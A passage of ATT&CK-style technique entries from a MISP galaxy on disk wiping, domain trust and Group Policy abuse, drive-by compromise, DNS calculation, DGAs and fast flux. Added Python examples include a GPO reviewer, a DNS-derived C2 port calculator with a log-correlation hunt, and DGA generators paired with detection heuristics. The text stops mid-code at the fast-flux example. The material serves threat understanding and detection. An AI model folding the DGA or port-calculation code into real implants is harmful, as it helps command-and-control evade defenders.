Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.<sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup><sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup> Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) to directly access disk content.<sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup><sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup> This behavior is distinct from [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) because sections of the disk are erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and SMB/Windows Admin Shares.<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>

The tag is: misp-galaxy:technique="Disk Content Wipe"

Disk Structure Wipe

Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system, targeting specific critical systems or large numbers of systems in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup> The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) may be performed in isolation, or along with [Disk Content Wipe](https://app.tidalcyber.com/technique/761fa7fa-d7e1-4796-85b3-5cd37d55dffa) if all sectors of a disk are wiped.

On network devices, adversaries may reformat the file system using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as format.<sup>[[format_cmd_cisco](https://app.tidalcyber.com/references/9442e08d-0858-5aa5-b642-a6b1e46018bc)]</sup>

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and SMB/Windows Admin Shares.<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup>

The tag is: misp-galaxy:technique="Disk Structure Wipe"

Disk Wipe

Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and SMB/Windows Admin Shares.<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>

On network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as erase.<sup>[[erase_cmd_cisco](https://app.tidalcyber.com/references/4c90eba9-118e-5d50-ad58-27bcb0e1e228)]</sup>

The tag is: misp-galaxy:technique="Disk Wipe"

Domain Trust Modification

Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.<sup>[[Microsoft - Azure AD Federation](https://app.tidalcyber.com/references/fedb345f-b5a7-40cd-98c7-6b14bab95ed9)]</sup> These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://app.tidalcyber.com/technique/dc0aecef-3cb2-4381-b6e4-dfa7be16d42b), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.<sup>[[AADInternals Azure AD Federated Domain](https://app.tidalcyber.com/references/d2005eb6-4da4-4938-97fb-caa0e2381f4e)]</sup>

The tag is: misp-galaxy:technique="Domain Trust Modification"

Group Policy Modification

Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path <code>\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\</code>.<sup>[[TechNet Group Policy Basics](https://app.tidalcyber.com/references/9b9c8c6c-c272-424e-a594-a34b7bf62477)]</sup><sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup>

Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.

Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6), [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242), [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce), [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf), and more.<sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup><sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup><sup>[[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)]</sup><sup>[[Microsoft Hacking Team Breach](https://app.tidalcyber.com/references/8daac742-6467-40db-9fe5-87efd2a96f09)]</sup> Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.<sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup>

For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8) by modifying GPO settings, in this case modifying <code><GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</code>.<sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup> In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code><GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary’s control would then be able to modify GPOs.<sup>[[Harmj0y SeEnableDelegationPrivilege Right](https://app.tidalcyber.com/references/e8f7df08-1a62-41d9-b8a4-ff39a2160294)]</sup>

The tag is: misp-galaxy:technique="Group Policy Modification"
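A defender-side check for the two GPO file abuses named in the entry above (SeEnableDelegationPrivilege grants in <code>GptTmpl.inf</code> and immediate tasks in <code>ScheduledTasks.xml</code>), as an added example that is not code from MISP, ATT&CK or any referenced project. Both input files are constructed stand-ins embedded in the block; the baseline of principals allowed to hold the delegation right, the placeholder SIDs and the placeholder clsid/uid values are assumptions for the example.

```python
"""Review Group Policy template files for two of the abuses described above.

Added example, not code from MISP, ATT&CK or any referenced project. It
parses a constructed GptTmpl.inf and a constructed ScheduledTasks.xml
(both small stand-ins for files under <GPO_PATH>\\MACHINE\\...) and reports
SeEnableDelegationPrivilege grants outside a baseline and immediate tasks
pushed through Group Policy Preferences.
"""
import configparser
import xml.etree.ElementTree as ET

# Constructed sample GptTmpl.inf. The [Privilege Rights] section grants the
# delegation right to BUILTIN\Administrators (S-1-5-32-544) and to a
# placeholder domain account SID that is not part of the baseline.
SAMPLE_GPTTMPL = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeEnableDelegationPrivilege = *S-1-5-32-544,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeRemoteInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-555
"""

# Constructed sample ScheduledTasks.xml with one ImmediateTaskV2 entry
# (the element type New-GPOImmediateTask writes) running as SYSTEM.
# clsid/uid values are placeholders, not real GUIDs.
SAMPLE_SCHEDTASKS_XML = r"""<ScheduledTasks clsid="{PLACEHOLDER-CLSID-1}">
  <ImmediateTaskV2 clsid="{PLACEHOLDER-CLSID-2}" name="Update" image="0"
                   changed="2024-01-01 00:00:00" uid="{PLACEHOLDER-UID}">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>C:\Windows\System32\cmd.exe</Command>
            <Arguments>/c whoami</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

# Principals expected to hold SeEnableDelegationPrivilege. Constructed
# baseline: only BUILTIN\Administrators; adjust to the domain's own policy.
DELEGATION_BASELINE = {"S-1-5-32-544"}


def parse_privilege_rights(inf_text):
    """Return {right_name: [SID, ...]} from the [Privilege Rights] section.

    GptTmpl.inf is INI-formatted; principals are written as *SID and joined
    with commas, so the leading '*' is stripped from each entry.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep SeXxxPrivilege names case-sensitive
    cp.read_string(inf_text)
    rights = {}
    if cp.has_section("Privilege Rights"):
        for name, value in cp.items("Privilege Rights"):
            rights[name] = [p.strip().lstrip("*") for p in value.split(",") if p.strip()]
    return rights


def unexpected_delegation_grants(inf_text, baseline=DELEGATION_BASELINE):
    """SIDs holding SeEnableDelegationPrivilege that are not in the baseline."""
    rights = parse_privilege_rights(inf_text)
    return [sid for sid in rights.get("SeEnableDelegationPrivilege", []) if sid not in baseline]


def immediate_tasks(xml_text):
    """List ImmediateTask* entries with the account and command they run."""
    root = ET.fromstring(xml_text)
    found = []
    for task in root:
        if not task.tag.startswith("ImmediateTask"):
            continue
        props = task.find("Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        cmd = task.findtext(".//Exec/Command", default="")
        args = task.findtext(".//Exec/Arguments", default="")
        found.append({"name": task.get("name", ""), "runAs": run_as,
                      "command": (cmd + " " + args).strip()})
    return found


def review_gpo(inf_text, xml_text, baseline=DELEGATION_BASELINE):
    """Human-readable findings for one GPO's template files."""
    findings = []
    for sid in unexpected_delegation_grants(inf_text, baseline):
        findings.append(f"SeEnableDelegationPrivilege granted to non-baseline SID {sid}")
    for task in immediate_tasks(xml_text):
        findings.append(f"immediate task '{task['name']}' runs as {task['runAs']}: {task['command']}")
    return findings


if __name__ == "__main__":
    for line in review_gpo(SAMPLE_GPTTMPL, SAMPLE_SCHEDTASKS_XML):
        print(line)
```

Run against real files, the same functions can be pointed at the <code>GptTmpl.inf</code> and <code>ScheduledTasks.xml</code> copied from each GPO folder under SYSVOL; note that real <code>GptTmpl.inf</code> files are commonly UTF-16 encoded, so decode them before passing the text in.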

Domain Policy Modification

Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.

With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://app.tidalcyber.com/technique/723c6d51-91db-4658-9ee0-eafb953c2d82) to computers throughout the domain environment<sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup><sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup> or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.<sup>[[Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks](https://app.tidalcyber.com/references/47031992-841f-4ef4-87c6-bb4c077fb8dc)]</sup> Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://app.tidalcyber.com/technique/c5eb5b88-6c62-4900-9b14-c4d67d420002).

Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

The tag is: misp-galaxy:technique="Domain Policy Modification"

Domain Trust Discovery

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.<sup>[[Microsoft Trusts](https://app.tidalcyber.com/references/e6bfc6a8-9eea-4c65-9c2b-04749da72a92)]</sup> Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5), [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a), and Kerberoasting.<sup>[[AdSecurity Forging Trust Tickets](https://app.tidalcyber.com/references/09d3ccc1-cd8a-4675-88c0-84110f5b8e8b)]</sup><sup>[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)]</sup> Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.<sup>[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)]</sup> The Windows utility [Nltest](https://app.tidalcyber.com/software/fbb1546a-f288-4e43-9e5c-14c94423c4f6) is known to be used by adversaries to enumerate domain trusts.<sup>[[Microsoft Operation Wilysupply](https://app.tidalcyber.com/references/567ce633-a061-460b-84af-01dfe3d818c7)]</sup>

The tag is: misp-galaxy:technique="Domain Trust Discovery"

Drive-by Compromise

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc).

Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5)), including:

  • A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting

  • Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary

  • Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://app.tidalcyber.com/technique/60ac24aa-ce63-5c1d-8126-db20a27d85be))

  • Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to as a strategic web compromise or watering hole attack. There are several known examples of this occurring.<sup>[[Shadowserver Strategic Web Compromise](https://app.tidalcyber.com/references/cf531866-ac3c-4078-b847-5b4af7eb161f)]</sup>

Typical drive-by compromise process:

  1. A user visits a website that is used to host the adversary controlled content.

  2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.

    • The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.

  3. Upon finding a vulnerable version, exploit code is delivered to the browser.

  4. If exploitation is successful, then it will give the adversary code execution on the user’s system unless other protections are in place.

    • In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.<sup>[[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)]</sup>

The tag is: misp-galaxy:technique="Drive-by Compromise"

DNS Calculation

Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. An IP address and/or port number calculation can be used to bypass egress filtering on a C2 channel.<sup>[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]</sup>

One implementation of [DNS Calculation](https://app.tidalcyber.com/technique/e9cc000d-174e-4e6c-9513-a0c000061700) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.<sup>[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]</sup><sup>[[Moran 2014](https://app.tidalcyber.com/references/15ef155b-7628-4b18-bc53-1d30be4eac5d)]</sup><sup>[[Rapid7G20Espionage](https://app.tidalcyber.com/references/2235ff2a-07b8-4198-b91d-e50739e274f4)]</sup>
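To make the mechanism concrete, here is an added example (not code from the galaxy, from ATT&CK, or from any of the cited reports). The port formula is a constructed illustration, not the arithmetic used by the malware those reports describe; what matters is that it is deterministic on both ends. The second function shows the defender's side once the formula has been recovered from a sample: correlating resolver logs with flow logs to find connections to the calculated port. Log shapes and the hosts `10.0.0.5`, `10.0.0.9`, `update.example` are constructed.

```python
import ipaddress
from collections import defaultdict


def calc_c2_port(answer_ip):
    """Derive the C2 port from the first three octets of a resolved address.

    The mixing below is a constructed illustration of the technique, not the
    formula of any named malware family: it only has to be deterministic on
    both sides, which is all the operator needs to steer implants to a new
    port by changing a DNS record.
    """
    o1, o2, o3, _ = ipaddress.IPv4Address(answer_ip).packed
    mixed = ((o1 << 8) | o2) ^ (o3 * 0x0101)       # 16-bit value from three octets
    return 1024 + mixed % (65535 - 1024)            # keep off the privileged range


def correlate_calculated_ports(dns_log, conn_log):
    """Hunt for the technique once the formula is known from reversing the sample.

    dns_log:  (ts, client, qname, answer_ip) as a resolver would log them
    conn_log: (ts, client, dst_ip, dst_port) as a flow sensor would log them
    A connection is suspicious when its destination port equals the port
    calculated from an address the same client resolved. The match is on the
    port, not the destination address, because the implant need not connect
    to the address the DNS answer carried.
    """
    expected = defaultdict(set)
    for _, client, qname, ip in dns_log:
        expected[client].add((calc_c2_port(ip), qname, ip))
    hits = []
    for ts, client, dst_ip, dst_port in conn_log:
        for port, qname, ip in expected.get(client, ()):
            if dst_port == port:
                hits.append({"ts": ts, "client": client, "qname": qname,
                             "answer": ip, "dst": dst_ip, "port": dst_port})
    return hits


# Constructed sample: one client resolves a name, then opens two connections.
SAMPLE_DNS = [("2024-03-01T10:00:00", "10.0.0.5", "update.example", "1.2.3.4")]
SAMPLE_CONN = [
    ("2024-03-01T10:00:01", "10.0.0.5", "5.6.7.8", 1537),   # port derived from 1.2.3.x
    ("2024-03-01T10:00:02", "10.0.0.5", "1.2.3.4", 443),
    ("2024-03-01T10:00:03", "10.0.0.9", "5.6.7.8", 1537),   # other client, never resolved it
]

if __name__ == "__main__":
    print(calc_c2_port("1.2.3.4"))
    for hit in correlate_calculated_ports(SAMPLE_DNS, SAMPLE_CONN):
        print(hit)
```

The last octet is deliberately ignored, so the operator can rotate the answer's host part without moving the port; a change in any of the first three octets moves it. The hunt only works after the formula is known, which is why this technique is a reverse-engineering problem before it is a detection problem.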

The tag is: misp-galaxy:technique="DNS Calculation"

Domain Generation Algorithms

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.<sup>[[Cybereason Dissecting DGAs](https://app.tidalcyber.com/references/9888cdb6-fe85-49b4-937c-75005ac9660d)]</sup><sup>[[Cisco Umbrella DGA](https://app.tidalcyber.com/references/5dbe2bcb-40b9-4ff8-a37a-0893a7a6cb58)]</sup><sup>[[Unit 42 DGA Feb 2019](https://app.tidalcyber.com/references/5e1db76a-0a3e-42ce-a66c-f914fb1a3471)]</sup>

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.<sup>[[Cybereason Dissecting DGAs](https://app.tidalcyber.com/references/9888cdb6-fe85-49b4-937c-75005ac9660d)]</sup><sup>[[Cisco Umbrella DGA](https://app.tidalcyber.com/references/5dbe2bcb-40b9-4ff8-a37a-0893a7a6cb58)]</sup><sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[Akamai DGA Mitigation](https://app.tidalcyber.com/references/5b14cdf6-261a-4d7e-acb4-74e7fafa9467)]</sup>

Adversaries may use DGAs for the purpose of [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1). When contact is lost with the primary command and control server, malware may employ a DGA as a means of reestablishing command and control.<sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]</sup><sup>[[ESET Sednit 2017 Activity](https://app.tidalcyber.com/references/406e434e-0602-4a08-bbf6-6d72311a720e)]</sup>
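The following added example (not code from the galaxy or from any malware family) shows both DGA styles described above, a time-and-seed based letter generator and a word-concatenation generator, and then two defender-side checks: the longest consonant run, which catches gibberish labels but not word-based ones, and the NXDOMAIN burst that a client produces while walking a DGA list until one registered domain answers. The generators, the word list, the resolver-log format and the hosts `10.0.0.5` and `10.0.0.7` are constructed.

```python
import hashlib
from collections import defaultdict
from datetime import date

TLDS = ("ru", "net", "com")
# Constructed word list for the word-concatenation variant.
WORDS = ("city", "july", "dish", "river", "stone", "blue", "green", "north", "paper", "light")


def _digest(day, seed, index):
    # One SHA-256 per candidate. Anything deterministic in (date, seed, index)
    # works, which is exactly why the operator can pre-register tomorrow's domains.
    day_str = day if isinstance(day, str) else day.isoformat()
    return hashlib.sha256(f"{seed}|{day_str}|{index}".encode()).digest()


def letter_dga(day, seed, count=10):
    """Gibberish-style DGA: one pseudo-random letter per byte of the digest."""
    domains = []
    for i in range(count):
        h = _digest(day, seed, i)
        length = 10 + h[0] % 6                      # labels of 10..15 letters
        label = "".join(chr(ord("a") + b % 26) for b in h[1:1 + length])
        domains.append(f"{label}.{TLDS[h[31] % len(TLDS)]}")
    return domains


def word_dga(day, seed, count=10):
    """Word-style DGA: three dictionary words glued together (cityjulydish-like)."""
    domains = []
    for i in range(count):
        h = _digest(day, seed, i)
        label = "".join(WORDS[h[j] % len(WORDS)] for j in (1, 2, 3))
        domains.append(f"{label}.{TLDS[h[31] % len(TLDS)]}")
    return domains


def max_consonant_run(label):
    """Longest run of consonants; gibberish labels score high, real words low."""
    run = best = 0
    for ch in label:
        if ch.isalpha() and ch not in "aeiou":
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def nxdomain_bursts(log_lines, threshold=8):
    """Flag clients with many NXDOMAIN answers: the signature of a client walking
    a DGA list until one registered domain resolves. Lines are
    '<timestamp> <client> <qname> <rcode>' (a constructed resolver-log shape)."""
    counts = defaultdict(int)
    for line in log_lines:
        _, client, _, rcode = line.split()
        if rcode == "NXDOMAIN":
            counts[client] += 1
    return {client: n for client, n in counts.items() if n >= threshold}


def sample_resolver_log():
    """Constructed log: one host walks the day's DGA list, a second host is clean."""
    lines = []
    for i, qname in enumerate(letter_dga(date(2024, 3, 1), "demo-seed", 12)):
        rcode = "NOERROR" if i == 11 else "NXDOMAIN"   # only the last one is registered
        lines.append(f"2024-03-01T00:00:{i:02d} 10.0.0.5 {qname} {rcode}")
    lines.append("2024-03-01T00:01:00 10.0.0.7 www.example.com NOERROR")
    lines.append("2024-03-01T00:01:05 10.0.0.7 wwww.example.com NXDOMAIN")
    return lines


if __name__ == "__main__":
    print(letter_dga("2024-03-01", "demo-seed", 3))
    print(word_dga("2024-03-01", "demo-seed", 3))
    print(nxdomain_bursts(sample_resolver_log()))
```

The consonant-run heuristic is cheap but brittle: `istgmxdejdnxuyla` scores 6 while `cityjulydish` scores 3, the same as many legitimate names, which is why word-based DGAs exist. The NXDOMAIN burst does not depend on how the labels look and is the check to keep when only one of the two can be deployed.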

The tag is: misp-galaxy:technique="Domain Generation Algorithms"

Fast Flux DNS

Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.<sup>[[MehtaFastFluxPt1](https://app.tidalcyber.com/references/5f169cae-6b59-4879-9a8f-93fdcea5cc58)]</sup><sup>[[MehtaFastFluxPt2](https://app.tidalcyber.com/references/f8a98e55-c91e-4b5e-b6f3-0065ef07375d)]</sup><sup>[[Fast Flux - Welivesecurity](https://app.tidalcyber.com/references/e232d739-663e-4878-b13b-9248cd81e657)]</sup>

The simplest, "single-flux" method, involves registering and de-registering addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.<sup>[[Fast Flux - Welivesecurity](https://app.tidalcyber.com/references/e232d739-663e-4878-b13b-9248cd81e657)]</sup>

In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.
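An added example of telling single-flux and double-flux apart from repeated resolutions (this is not code from the galaxy or from the cited write-ups). It classifies a name by the three signals the text describes: short TTL, many distinct A records and, for double-flux, a churning NS set. Counting distinct /16 prefixes is an assumption added here as a cheap proxy for network diversity: a CDN also rotates many addresses with short TTLs, but inside a few provider blocks, whereas a flux network spreads across unrelated networks. The observation format, thresholds and the names `flux.example`, `cdn.example` and `static.example` are constructed; the sample assumes A and NS observations are recorded under the zone name.

```python
import ipaddress
from collections import defaultdict


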